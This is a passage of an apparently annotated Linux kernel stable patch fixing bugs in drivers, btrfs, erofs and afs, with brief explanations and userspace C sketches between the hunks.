++		bus_unregister(&mdev_bus_type);
++		return -ENOMEM;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit mdev_exit(void)
+ {
+-	if (mdev_bus_compat_class)
+-		class_compat_unregister(mdev_bus_compat_class);
++	class_compat_unregister(mdev_bus_compat_class);
+ 	bus_unregister(&mdev_bus_type);
+ }
+ 
+diff --git a/drivers/video/fbdev/omap/lcd_mipid.c b/drivers/video/fbdev/omap/lcd_mipid.c
+index 03cff39d392db..cc1079aad61f2 100644
+--- a/drivers/video/fbdev/omap/lcd_mipid.c
++++ b/drivers/video/fbdev/omap/lcd_mipid.c
+@@ -563,11 +563,15 @@ static int mipid_spi_probe(struct spi_device *spi)
+ 
+ 	r = mipid_detect(md);
+ 	if (r < 0)
+-		return r;
++		goto free_md;
+ 
+ 	omapfb_register_panel(&md->panel);
+ 
+ 	return 0;
++
++free_md:
++	kfree(md);
++	return r;
+ }
+ 
+ static void mipid_spi_remove(struct spi_device *spi)
+diff --git a/drivers/virt/coco/sev-guest/Kconfig b/drivers/virt/coco/sev-guest/Kconfig
+index f9db0799ae67c..da2d7ca531f0f 100644
+--- a/drivers/virt/coco/sev-guest/Kconfig
++++ b/drivers/virt/coco/sev-guest/Kconfig
+@@ -2,6 +2,7 @@ config SEV_GUEST
+ 	tristate "AMD SEV Guest driver"
+ 	default m
+ 	depends on AMD_MEM_ENCRYPT
++	select CRYPTO
+ 	select CRYPTO_AEAD2
+ 	select CRYPTO_GCM
+ 	help
+diff --git a/drivers/w1/slaves/w1_therm.c b/drivers/w1/slaves/w1_therm.c
+index 067692626cf07..99c58bd9d2df0 100644
+--- a/drivers/w1/slaves/w1_therm.c
++++ b/drivers/w1/slaves/w1_therm.c
+@@ -1159,29 +1159,26 @@ static int convert_t(struct w1_slave *sl, struct therm_info *info)
+ 
+ 			w1_write_8(dev_master, W1_CONVERT_TEMP);
+ 
+-			if (strong_pullup) { /*some device need pullup */
++			if (SLAVE_FEATURES(sl) & W1_THERM_POLL_COMPLETION) {
++				ret = w1_poll_completion(dev_master, W1_POLL_CONVERT_TEMP);
++				if (ret) {
++					dev_dbg(&sl->dev, "%s: Timeout\n", __func__);
++					goto mt_unlock;
++				}
++				mutex_unlock(&dev_master->bus_mutex);
++			} else if (!strong_pullup) { /* no device needs pullup */
+ 				sleep_rem = msleep_interruptible(t_conv);
+ 				if (sleep_rem != 0) {
+ 					ret = -EINTR;
+ 					goto mt_unlock;
+ 				}
+ 				mutex_unlock(&dev_master->bus_mutex);
+-			} else { /*no device need pullup */
+-				if (SLAVE_FEATURES(sl) & W1_THERM_POLL_COMPLETION) {
+-					ret = w1_poll_completion(dev_master, W1_POLL_CONVERT_TEMP);
+-					if (ret) {
+-						dev_dbg(&sl->dev, "%s: Timeout\n", __func__);
+-						goto mt_unlock;
+-					}
+-					mutex_unlock(&dev_master->bus_mutex);
+-				} else {
+-					/* Fixed delay */
+-					mutex_unlock(&dev_master->bus_mutex);
+-					sleep_rem = msleep_interruptible(t_conv);
+-					if (sleep_rem != 0) {
+-						ret = -EINTR;
+-						goto dec_refcnt;
+-					}
++			} else { /* some devices need pullup */
++				mutex_unlock(&dev_master->bus_mutex);
++				sleep_rem = msleep_interruptible(t_conv);
++				if (sleep_rem != 0) {
++					ret = -EINTR;
++					goto dec_refcnt;
+ 				}
+ 			}
+ 			ret = read_scratchpad(sl, info);
+diff --git a/drivers/w1/w1.c b/drivers/w1/w1.c
+index 4a2ddf730a3ac..2eee26b7fc4a3 100644
+--- a/drivers/w1/w1.c
++++ b/drivers/w1/w1.c
+@@ -1263,10 +1263,10 @@ err_out_exit_init:
+ 
+ static void __exit w1_fini(void)
+ {
+-	struct w1_master *dev;
++	struct w1_master *dev, *n;
+ 
+ 	/* Set netlink removal messages and some cleanup */
+-	list_for_each_entry(dev, &w1_masters, w1_master_entry)
++	list_for_each_entry_safe(dev, n, &w1_masters, w1_master_entry)
+ 		__w1_remove_master_device(dev);
+ 
+ 	w1_fini_netlink();
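The w1_fini() fix switches to list_for_each_entry_safe() because __w1_remove_master_device() unlinks and frees the node under iteration; the _safe variant caches the next pointer before the loop body runs. The same hazard shown in plain C:

#include <stdio.h>
#include <stdlib.h>

struct node { int id; struct node *next; };

static void remove_all(struct node **head)
{
	struct node *cur = *head, *next;

	while (cur) {
		next = cur->next;	/* cache before freeing, like _safe */
		printf("removing %d\n", cur->id);
		free(cur);		/* cur->next is now invalid */
		cur = next;
	}
	*head = NULL;
}

int main(void)
{
	struct node *head = NULL;

	for (int i = 0; i < 3; i++) {
		struct node *n = malloc(sizeof(*n));

		n->id = i;
		n->next = head;
		head = n;
	}
	remove_all(&head);
	return 0;
}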
+diff --git a/fs/afs/write.c b/fs/afs/write.c
+index 08fd456dde67c..3ecc212b62099 100644
+--- a/fs/afs/write.c
++++ b/fs/afs/write.c
+@@ -381,17 +381,19 @@ static int afs_store_data(struct afs_vnode *vnode, struct iov_iter *iter, loff_t
+ 	afs_op_set_vnode(op, 0, vnode);
+ 	op->file[0].dv_delta = 1;
+ 	op->file[0].modification = true;
+-	op->store.write_iter = iter;
+ 	op->store.pos = pos;
+ 	op->store.size = size;
+-	op->store.i_size = max(pos + size, vnode->netfs.remote_i_size);
+ 	op->store.laundering = laundering;
+-	op->mtime = vnode->netfs.inode.i_mtime;
+ 	op->flags |= AFS_OPERATION_UNINTR;
+ 	op->ops = &afs_store_data_operation;
+ 
+ try_next_key:
+ 	afs_begin_vnode_operation(op);
++
++	op->store.write_iter = iter;
++	op->store.i_size = max(pos + size, vnode->netfs.remote_i_size);
++	op->mtime = vnode->netfs.inode.i_mtime;
++
+ 	afs_wait_for_operation(op);
+ 
+ 	switch (op->error) {
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 74a5c94898b0f..30b264eb9d209 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -79,14 +79,21 @@ static u64 btrfs_reduce_alloc_profile(struct btrfs_fs_info *fs_info, u64 flags)
+ 	}
+ 	allowed &= flags;
+ 
+-	if (allowed & BTRFS_BLOCK_GROUP_RAID6)
++	/* Select the highest-redundancy RAID level. */
++	if (allowed & BTRFS_BLOCK_GROUP_RAID1C4)
++		allowed = BTRFS_BLOCK_GROUP_RAID1C4;
++	else if (allowed & BTRFS_BLOCK_GROUP_RAID6)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID6;
++	else if (allowed & BTRFS_BLOCK_GROUP_RAID1C3)
++		allowed = BTRFS_BLOCK_GROUP_RAID1C3;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID5)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID5;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID10)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID10;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID1)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID1;
++	else if (allowed & BTRFS_BLOCK_GROUP_DUP)
++		allowed = BTRFS_BLOCK_GROUP_DUP;
+ 	else if (allowed & BTRFS_BLOCK_GROUP_RAID0)
+ 		allowed = BTRFS_BLOCK_GROUP_RAID0;
+ 
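The reworked chain now ranks every profile by redundancy instead of the old partial list, so RAID1C4 wins over RAID6 and DUP wins over RAID0 when a profile is reduced. A table-driven sketch of the same pick-the-highest-ranked-flag logic (flag values are illustrative, not the on-disk BTRFS_BLOCK_GROUP_* bits):

#include <stdio.h>

enum {
	RAID0	= 1 << 0,
	DUP	= 1 << 1,
	RAID1	= 1 << 2,
	RAID10	= 1 << 3,
	RAID5	= 1 << 4,
	RAID1C3	= 1 << 5,
	RAID6	= 1 << 6,
	RAID1C4	= 1 << 7,
};

/* Ordered from most to least redundant, mirroring the if/else chain. */
static const unsigned int by_redundancy[] = {
	RAID1C4, RAID6, RAID1C3, RAID5, RAID10, RAID1, DUP, RAID0,
};

static unsigned int reduce_profile(unsigned int allowed)
{
	for (size_t i = 0; i < sizeof(by_redundancy) / sizeof(*by_redundancy); i++)
		if (allowed & by_redundancy[i])
			return by_redundancy[i];
	return 0;
}

int main(void)
{
	printf("%#x\n", reduce_profile(RAID6 | RAID1C4));	/* RAID1C4 */
	printf("%#x\n", reduce_profile(RAID0 | DUP));		/* DUP */
	return 0;
}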
+@@ -1596,8 +1603,15 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		}
+ 		spin_unlock(&bg->lock);
+ 
+-		/* Get out fast, in case we're unmounting the filesystem */
+-		if (btrfs_fs_closing(fs_info)) {
++		/*
++		 * Get out fast, in case we're read-only or unmounting the
++		 * filesystem. It is OK to drop block groups from the list even
++		 * for the read-only case. Since we did sb_start_write(),
++		 * "mount -o remount,ro" cannot happen here; a read-only
++		 * filesystem means it was forced read-only by a fatal error
++		 * and never gets back to read-write to let us reclaim again.
++		 */
++		if (btrfs_need_cleaner_sleep(fs_info)) {
+ 			up_write(&space_info->groups_sem);
+ 			goto next;
+ 		}
+@@ -1628,11 +1642,27 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ 		}
+ 
+ next:
++		if (ret)
++			btrfs_mark_bg_to_reclaim(bg);
+ 		btrfs_put_block_group(bg);
++
++		mutex_unlock(&fs_info->reclaim_bgs_lock);
++		/*
++		 * Reclaiming all the block groups in the list can take really
++		 * long.  Prioritize cleaning up unused block groups.
++		 */
++		btrfs_delete_unused_bgs(fs_info);
++		/*
++		 * If we are interrupted by a balance, we can just bail out. The
++		 * cleaner thread will restart again if necessary.
++		 */
++		if (!mutex_trylock(&fs_info->reclaim_bgs_lock))
++			goto end;
+ 		spin_lock(&fs_info->unused_bgs_lock);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
++end:
+ 	btrfs_exclop_finish(fs_info);
+ 	sb_end_write(fs_info->sb);
+ }
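
The reworked cascade in btrfs_reduce_alloc_profile() is a priority selection over a bitmask: keep only the most redundant profile present. A userspace sketch of that idea, with made-up flag values rather than the real BTRFS_BLOCK_GROUP_* constants:

#include <stddef.h>
#include <stdio.h>

/* Illustrative flags, not the on-disk btrfs values. */
#define RAID1C4	(1u << 0)
#define RAID6	(1u << 1)
#define RAID1C3	(1u << 2)
#define RAID5	(1u << 3)
#define RAID10	(1u << 4)
#define RAID1	(1u << 5)
#define DUP	(1u << 6)
#define RAID0	(1u << 7)

/* Keep only the most redundant profile present in "allowed",
 * in the same order as the patched if/else cascade. */
static unsigned int reduce_profile(unsigned int allowed)
{
	static const unsigned int order[] = {
		RAID1C4, RAID6, RAID1C3, RAID5, RAID10, RAID1, DUP, RAID0,
	};

	for (size_t i = 0; i < sizeof(order) / sizeof(order[0]); i++)
		if (allowed & order[i])
			return order[i];
	return 0;	/* nothing set: plain SINGLE */
}

int main(void)
{
	/* RAID1C3 wins over RAID5 and RAID0. */
	printf("%#x\n", reduce_profile(RAID5 | RAID1C3 | RAID0));
	return 0;
}
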
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index ab9f8d6c4f1b9..1a327eb3580b4 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -475,9 +475,14 @@ static noinline int __btrfs_cow_block(struct btrfs_trans_handle *trans,
+ 		    btrfs_header_backref_rev(buf) < BTRFS_MIXED_BACKREF_REV)
+ 			parent_start = buf->start;
+ 
+-		atomic_inc(&cow->refs);
+ 		ret = btrfs_tree_mod_log_insert_root(root->node, cow, true);
+-		BUG_ON(ret < 0);
++		if (ret < 0) {
++			btrfs_tree_unlock(cow);
++			free_extent_buffer(cow);
++			btrfs_abort_transaction(trans, ret);
++			return ret;
++		}
++		atomic_inc(&cow->refs);
+ 		rcu_assign_pointer(root->node, cow);
+ 
+ 		btrfs_free_tree_block(trans, btrfs_root_id(root), buf,
+@@ -935,7 +940,12 @@ static noinline int balance_level(struct btrfs_trans_handle *trans,
+ 		}
+ 
+ 		ret = btrfs_tree_mod_log_insert_root(root->node, child, true);
+-		BUG_ON(ret < 0);
++		if (ret < 0) {
++			btrfs_tree_unlock(child);
++			free_extent_buffer(child);
++			btrfs_abort_transaction(trans, ret);
++			goto enospc;
++		}
+ 		rcu_assign_pointer(root->node, child);
+ 
+ 		add_root_to_dirty_list(root);
+@@ -1017,7 +1027,10 @@ static noinline int balance_level(struct btrfs_trans_handle *trans,
+ 			btrfs_node_key(right, &right_key, 0);
+ 			ret = btrfs_tree_mod_log_insert_key(parent, pslot + 1,
+ 					BTRFS_MOD_LOG_KEY_REPLACE, GFP_NOFS);
+-			BUG_ON(ret < 0);
++			if (ret < 0) {
++				btrfs_abort_transaction(trans, ret);
++				goto enospc;
++			}
+ 			btrfs_set_node_key(parent, &right_key, pslot + 1);
+ 			btrfs_mark_buffer_dirty(parent);
+ 		}
+@@ -1063,7 +1076,10 @@ static noinline int balance_level(struct btrfs_trans_handle *trans,
+ 		btrfs_node_key(mid, &mid_key, 0);
+ 		ret = btrfs_tree_mod_log_insert_key(parent, pslot,
+ 				BTRFS_MOD_LOG_KEY_REPLACE, GFP_NOFS);
+-		BUG_ON(ret < 0);
++		if (ret < 0) {
++			btrfs_abort_transaction(trans, ret);
++			goto enospc;
++		}
+ 		btrfs_set_node_key(parent, &mid_key, pslot);
+ 		btrfs_mark_buffer_dirty(parent);
+ 	}
+@@ -2850,6 +2866,8 @@ static noinline int split_node(struct btrfs_trans_handle *trans,
+ 
+ 	ret = btrfs_tree_mod_log_eb_copy(split, c, 0, mid, c_nritems - mid);
+ 	if (ret) {
++		btrfs_tree_unlock(split);
++		free_extent_buffer(split);
+ 		btrfs_abort_transaction(trans, ret);
+ 		return ret;
+ 	}
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index e040eea3937d7..a07450f64abb1 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1275,7 +1275,10 @@ int btrfs_delete_free_space_tree(struct btrfs_fs_info *fs_info)
+ 		goto abort;
+ 
+ 	btrfs_global_root_delete(free_space_root);
++
++	spin_lock(&fs_info->trans_lock);
+ 	list_del(&free_space_root->dirty_list);
++	spin_unlock(&fs_info->trans_lock);
+ 
+ 	btrfs_tree_lock(free_space_root->node);
+ 	btrfs_clean_tree_block(free_space_root->node);
+diff --git a/fs/btrfs/locking.c b/fs/btrfs/locking.c
+index 0eab3cb274a18..df98e64d7dc67 100644
+--- a/fs/btrfs/locking.c
++++ b/fs/btrfs/locking.c
+@@ -56,8 +56,8 @@
+ 
+ static struct btrfs_lockdep_keyset {
+ 	u64			id;		/* root objectid */
+-	/* Longest entry: btrfs-free-space-00 */
+-	char			names[BTRFS_MAX_LEVEL][20];
++	/* Longest entry: btrfs-block-group-00 */
++	char			names[BTRFS_MAX_LEVEL][24];
+ 	struct lock_class_key	keys[BTRFS_MAX_LEVEL];
+ } btrfs_lockdep_keysets[] = {
+ 	{ .id = BTRFS_ROOT_TREE_OBJECTID,	DEFINE_NAME("root")	},
+@@ -71,6 +71,7 @@ static struct btrfs_lockdep_keyset {
+ 	{ .id = BTRFS_DATA_RELOC_TREE_OBJECTID,	DEFINE_NAME("dreloc")	},
+ 	{ .id = BTRFS_UUID_TREE_OBJECTID,	DEFINE_NAME("uuid")	},
+ 	{ .id = BTRFS_FREE_SPACE_TREE_OBJECTID,	DEFINE_NAME("free-space") },
++	{ .id = BTRFS_BLOCK_GROUP_TREE_OBJECTID, DEFINE_NAME("block-group") },
+ 	{ .id = 0,				DEFINE_NAME("tree")	},
+ };
+ 
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index f8b0548988858..04ca0a4075b6c 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1296,7 +1296,9 @@ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ 		goto out;
+ 	}
+ 
++	spin_lock(&fs_info->trans_lock);
+ 	list_del(&quota_root->dirty_list);
++	spin_unlock(&fs_info->trans_lock);
+ 
+ 	btrfs_tree_lock(quota_root->node);
+ 	btrfs_clean_tree_block(quota_root->node);
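
The free-space-tree.c and qgroup.c hunks above fix the same pattern: the root's dirty_list is manipulated elsewhere under fs_info->trans_lock, so the final list_del() must take that lock too. A compressed sketch of the rule, with a pthread mutex standing in for the spinlock and a counter for the list:

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t trans_lock = PTHREAD_MUTEX_INITIALIZER;
static int dirty_roots = 1;	/* stands in for dirty_list membership */

static void delete_root(void)
{
	/* The fix: unlink under the same lock that guards the list. */
	pthread_mutex_lock(&trans_lock);
	dirty_roots--;		/* list_del(&root->dirty_list) */
	pthread_mutex_unlock(&trans_lock);
}

int main(void)
{
	delete_root();
	printf("dirty roots: %d\n", dirty_roots);
	return 0;
}
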
+diff --git a/fs/erofs/data.c b/fs/erofs/data.c
+index fe8ac0e163f7e..b32801d716f89 100644
+--- a/fs/erofs/data.c
++++ b/fs/erofs/data.c
+@@ -95,11 +95,8 @@ static int erofs_map_blocks_flatmode(struct inode *inode,
+ 		map->m_pa = blknr_to_addr(vi->raw_blkaddr) + map->m_la;
+ 		map->m_plen = blknr_to_addr(lastblk) - offset;
+ 	} else if (tailendpacking) {
+-		/* 2 - inode inline B: inode, [xattrs], inline last blk... */
+-		struct erofs_sb_info *sbi = EROFS_SB(inode->i_sb);
+-
+-		map->m_pa = iloc(sbi, vi->nid) + vi->inode_isize +
+-			vi->xattr_isize + erofs_blkoff(map->m_la);
++		map->m_pa = erofs_iloc(inode) + vi->inode_isize +
++			vi->xattr_isize + erofs_blkoff(offset);
+ 		map->m_plen = inode->i_size - offset;
+ 
+ 		/* inline data should be located in the same meta block */
+@@ -154,7 +151,7 @@ int erofs_map_blocks(struct inode *inode,
+ 		unit = EROFS_BLOCK_MAP_ENTRY_SIZE;	/* block map */
+ 
+ 	chunknr = map->m_la >> vi->chunkbits;
+-	pos = ALIGN(iloc(EROFS_SB(sb), vi->nid) + vi->inode_isize +
++	pos = ALIGN(erofs_iloc(inode) + vi->inode_isize +
+ 		    vi->xattr_isize, unit) + unit * chunknr;
+ 
+ 	kaddr = erofs_read_metabuf(&buf, sb, erofs_blknr(pos), EROFS_KMAP);
+diff --git a/fs/erofs/inode.c b/fs/erofs/inode.c
+index ad2a82f2eb4cd..5aadc73d57652 100644
+--- a/fs/erofs/inode.c
++++ b/fs/erofs/inode.c
+@@ -14,7 +14,7 @@ static void *erofs_read_inode(struct erofs_buf *buf,
+ 	struct super_block *sb = inode->i_sb;
+ 	struct erofs_sb_info *sbi = EROFS_SB(sb);
+ 	struct erofs_inode *vi = EROFS_I(inode);
+-	const erofs_off_t inode_loc = iloc(sbi, vi->nid);
++	const erofs_off_t inode_loc = erofs_iloc(inode);
+ 
+ 	erofs_blk_t blkaddr, nblks = 0;
+ 	void *kaddr;
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index 340bd56a57559..d8d09fc3ed655 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -273,11 +273,6 @@ struct erofs_buf {
+ #define erofs_blkoff(addr)      ((addr) % EROFS_BLKSIZ)
+ #define blknr_to_addr(nr)       ((erofs_off_t)(nr) * EROFS_BLKSIZ)
+ 
+-static inline erofs_off_t iloc(struct erofs_sb_info *sbi, erofs_nid_t nid)
+-{
+-	return blknr_to_addr(sbi->meta_blkaddr) + (nid << sbi->islotbits);
+-}
+-
+ #define EROFS_FEATURE_FUNCS(name, compat, feature) \
+ static inline bool erofs_sb_has_##name(struct erofs_sb_info *sbi) \
+ { \
+@@ -342,8 +337,15 @@ struct erofs_inode {
+ 	struct inode vfs_inode;
+ };
+ 
+-#define EROFS_I(ptr)	\
+-	container_of(ptr, struct erofs_inode, vfs_inode)
++#define EROFS_I(ptr)	container_of(ptr, struct erofs_inode, vfs_inode)
++
++static inline erofs_off_t erofs_iloc(struct inode *inode)
++{
++	struct erofs_sb_info *sbi = EROFS_I_SB(inode);
++
++	return blknr_to_addr(sbi->meta_blkaddr) +
++		(EROFS_I(inode)->nid << sbi->islotbits);
++}
+ 
+ static inline unsigned long erofs_inode_datablocks(struct inode *inode)
+ {
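
The new erofs_iloc() helper centralizes one piece of arithmetic: an inode's byte offset is the metadata base block scaled to bytes, plus the inode number shifted by the slot size. A standalone sketch, assuming the usual 4096-byte block and 32-byte inode slots (islotbits == 5); the values are illustrative:

#include <stdint.h>
#include <stdio.h>

#define BLKSIZ	4096u	/* EROFS_BLKSIZ on this kernel; illustrative here */

/* Same shape as erofs_iloc(): metadata base in blocks,
 * inode slot index scaled by 1 << islotbits bytes. */
static uint64_t iloc(uint32_t meta_blkaddr, uint64_t nid, unsigned int islotbits)
{
	return (uint64_t)meta_blkaddr * BLKSIZ + (nid << islotbits);
}

int main(void)
{
	/* Meta area at block 2, 32-byte slots: nid 10 lives at 8192 + 320. */
	printf("%llu\n", (unsigned long long)iloc(2, 10, 5));
	return 0;
}
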
+diff --git a/fs/erofs/tagptr.h b/fs/erofs/tagptr.h
+deleted file mode 100644
+index 64ceb7270b5c1..0000000000000
+--- a/fs/erofs/tagptr.h
++++ /dev/null
+@@ -1,107 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-only */
+-/*
+- * A tagged pointer implementation
+- */
+-#ifndef __EROFS_FS_TAGPTR_H
+-#define __EROFS_FS_TAGPTR_H
+-
+-#include <linux/types.h>
+-#include <linux/build_bug.h>
+-
+-/*
+- * the name of tagged pointer types are tagptr{1, 2, 3...}_t
+- * avoid directly using the internal structs __tagptr{1, 2, 3...}
+- */
+-#define __MAKE_TAGPTR(n) \
+-typedef struct __tagptr##n {	\
+-	uintptr_t v;	\
+-} tagptr##n##_t;
+-
+-__MAKE_TAGPTR(1)
+-__MAKE_TAGPTR(2)
+-__MAKE_TAGPTR(3)
+-__MAKE_TAGPTR(4)
+-
+-#undef __MAKE_TAGPTR
+-
+-extern void __compiletime_error("bad tagptr tags")
+-	__bad_tagptr_tags(void);
+-
+-extern void __compiletime_error("bad tagptr type")
+-	__bad_tagptr_type(void);
+-
+-/* fix the broken usage of "#define tagptr2_t tagptr3_t" by users */
+-#define __tagptr_mask_1(ptr, n)	\
+-	__builtin_types_compatible_p(typeof(ptr), struct __tagptr##n) ? \
+-		(1UL << (n)) - 1 :
+-
+-#define __tagptr_mask(ptr)	(\
+-	__tagptr_mask_1(ptr, 1) ( \
+-	__tagptr_mask_1(ptr, 2) ( \
+-	__tagptr_mask_1(ptr, 3) ( \
+-	__tagptr_mask_1(ptr, 4) ( \
+-	__bad_tagptr_type(), 0)))))
+-
+-/* generate a tagged pointer from a raw value */
+-#define tagptr_init(type, val) \
+-	((typeof(type)){ .v = (uintptr_t)(val) })
+-
+-/*
+- * directly cast a tagged pointer to the native pointer type, which
+- * could be used for backward compatibility of existing code.
+- */
+-#define tagptr_cast_ptr(tptr) ((void *)(tptr).v)
+-
+-/* encode tagged pointers */
+-#define tagptr_fold(type, ptr, _tags) ({ \
+-	const typeof(_tags) tags = (_tags); \
+-	if (__builtin_constant_p(tags) && (tags & ~__tagptr_mask(type))) \
+-		__bad_tagptr_tags(); \
+-tagptr_init(type, (uintptr_t)(ptr) | tags); })
+-
+-/* decode tagged pointers */
+-#define tagptr_unfold_ptr(tptr) \
+-	((void *)((tptr).v & ~__tagptr_mask(tptr)))
+-
+-#define tagptr_unfold_tags(tptr) \
+-	((tptr).v & __tagptr_mask(tptr))
+-
+-/* operations for the tagger pointer */
+-#define tagptr_eq(_tptr1, _tptr2) ({ \
+-	typeof(_tptr1) tptr1 = (_tptr1); \
+-	typeof(_tptr2) tptr2 = (_tptr2); \
+-	(void)(&tptr1 == &tptr2); \
+-(tptr1).v == (tptr2).v; })
+-
+-/* lock-free CAS operation */
+-#define tagptr_cmpxchg(_ptptr, _o, _n) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	typeof(_o) o = (_o); \
+-	typeof(_n) n = (_n); \
+-	(void)(&o == &n); \
+-	(void)(&o == ptptr); \
+-tagptr_init(o, cmpxchg(&ptptr->v, o.v, n.v)); })
+-
+-/* wrap WRITE_ONCE if atomic update is needed */
+-#define tagptr_replace_tags(_ptptr, tags) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	*ptptr = tagptr_fold(*ptptr, tagptr_unfold_ptr(*ptptr), tags); \
+-*ptptr; })
+-
+-#define tagptr_set_tags(_ptptr, _tags) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	const typeof(_tags) tags = (_tags); \
+-	if (__builtin_constant_p(tags) && (tags & ~__tagptr_mask(*ptptr))) \
+-		__bad_tagptr_tags(); \
+-	ptptr->v |= tags; \
+-*ptptr; })
+-
+-#define tagptr_clear_tags(_ptptr, _tags) ({ \
+-	typeof(_ptptr) ptptr = (_ptptr); \
+-	const typeof(_tags) tags = (_tags); \
+-	if (__builtin_constant_p(tags) && (tags & ~__tagptr_mask(*ptptr))) \
+-		__bad_tagptr_tags(); \
+-	ptptr->v &= ~tags; \
+-*ptptr; })
+-
+-#endif	/* __EROFS_FS_TAGPTR_H */
+diff --git a/fs/erofs/xattr.c b/fs/erofs/xattr.c
+index 8106bcb5a38d1..a2776abf36986 100644
+--- a/fs/erofs/xattr.c
++++ b/fs/erofs/xattr.c
+@@ -22,8 +22,7 @@ static int init_inode_xattrs(struct inode *inode)
+ 	struct xattr_iter it;
+ 	unsigned int i;
+ 	struct erofs_xattr_ibody_header *ih;
+-	struct super_block *sb;
+-	struct erofs_sb_info *sbi;
++	struct super_block *sb = inode->i_sb;
+ 	int ret = 0;
+ 
+ 	/* the most case is that xattrs of this inode are initialized. */
+@@ -52,15 +51,14 @@ static int init_inode_xattrs(struct inode *inode)
+ 	 *    undefined right now (maybe use later with some new sb feature).
+ 	 */
+ 	if (vi->xattr_isize == sizeof(struct erofs_xattr_ibody_header)) {
+-		erofs_err(inode->i_sb,
++		erofs_err(sb,
+ 			  "xattr_isize %d of nid %llu is not supported yet",
+ 			  vi->xattr_isize, vi->nid);
+ 		ret = -EOPNOTSUPP;
+ 		goto out_unlock;
+ 	} else if (vi->xattr_isize < sizeof(struct erofs_xattr_ibody_header)) {
+ 		if (vi->xattr_isize) {
+-			erofs_err(inode->i_sb,
+-				  "bogus xattr ibody @ nid %llu", vi->nid);
++			erofs_err(sb, "bogus xattr ibody @ nid %llu", vi->nid);
+ 			DBG_BUGON(1);
+ 			ret = -EFSCORRUPTED;
+ 			goto out_unlock;	/* xattr ondisk layout error */
+@@ -69,11 +67,9 @@ static int init_inode_xattrs(struct inode *inode)
+ 		goto out_unlock;
+ 	}
+ 
+-	sb = inode->i_sb;
+-	sbi = EROFS_SB(sb);
+ 	it.buf = __EROFS_BUF_INITIALIZER;
+-	it.blkaddr = erofs_blknr(iloc(sbi, vi->nid) + vi->inode_isize);
+-	it.ofs = erofs_blkoff(iloc(sbi, vi->nid) + vi->inode_isize);
++	it.blkaddr = erofs_blknr(erofs_iloc(inode) + vi->inode_isize);
++	it.ofs = erofs_blkoff(erofs_iloc(inode) + vi->inode_isize);
+ 
+ 	/* read in shared xattr array (non-atomic, see kmalloc below) */
+ 	it.kaddr = erofs_read_metabuf(&it.buf, sb, it.blkaddr, EROFS_KMAP);
+@@ -159,7 +155,6 @@ static int inline_xattr_iter_begin(struct xattr_iter *it,
+ 				   struct inode *inode)
+ {
+ 	struct erofs_inode *const vi = EROFS_I(inode);
+-	struct erofs_sb_info *const sbi = EROFS_SB(inode->i_sb);
+ 	unsigned int xattr_header_sz, inline_xattr_ofs;
+ 
+ 	xattr_header_sz = inlinexattr_header_size(inode);
+@@ -170,9 +165,8 @@ static int inline_xattr_iter_begin(struct xattr_iter *it,
+ 
+ 	inline_xattr_ofs = vi->inode_isize + xattr_header_sz;
+ 
+-	it->blkaddr = erofs_blknr(iloc(sbi, vi->nid) + inline_xattr_ofs);
+-	it->ofs = erofs_blkoff(iloc(sbi, vi->nid) + inline_xattr_ofs);
+-
++	it->blkaddr = erofs_blknr(erofs_iloc(inode) + inline_xattr_ofs);
++	it->ofs = erofs_blkoff(erofs_iloc(inode) + inline_xattr_ofs);
+ 	it->kaddr = erofs_read_metabuf(&it->buf, inode->i_sb, it->blkaddr,
+ 				       EROFS_KMAP_ATOMIC);
+ 	if (IS_ERR(it->kaddr))
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index cf4871834ebb2..92b2e4ddb7ce9 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -4,13 +4,174 @@
+  *             https://www.huawei.com/
+  * Copyright (C) 2022 Alibaba Cloud
+  */
+-#include "zdata.h"
+ #include "compress.h"
+ #include <linux/prefetch.h>
+ #include <linux/psi.h>
+ 
+ #include <trace/events/erofs.h>
+ 
++#define Z_EROFS_PCLUSTER_MAX_PAGES	(Z_EROFS_PCLUSTER_MAX_SIZE / PAGE_SIZE)
++#define Z_EROFS_INLINE_BVECS		2
++
++/*
++ * let's leave a type here in case of introducing
++ * another tagged pointer later.
++ */
++typedef void *z_erofs_next_pcluster_t;
++
++struct z_erofs_bvec {
++	struct page *page;
++	int offset;
++	unsigned int end;
++};
++
++#define __Z_EROFS_BVSET(name, total) \
++struct name { \
++	/* point to the next page which contains the following bvecs */ \
++	struct page *nextpage; \
++	struct z_erofs_bvec bvec[total]; \
++}
++__Z_EROFS_BVSET(z_erofs_bvset,);
++__Z_EROFS_BVSET(z_erofs_bvset_inline, Z_EROFS_INLINE_BVECS);
++
++/*
++ * Structure fields follow one of the following exclusion rules.
++ *
++ * I: Modifiable by initialization/destruction paths and read-only
++ *    for everyone else;
++ *
++ * L: Field should be protected by the pcluster lock;
++ *
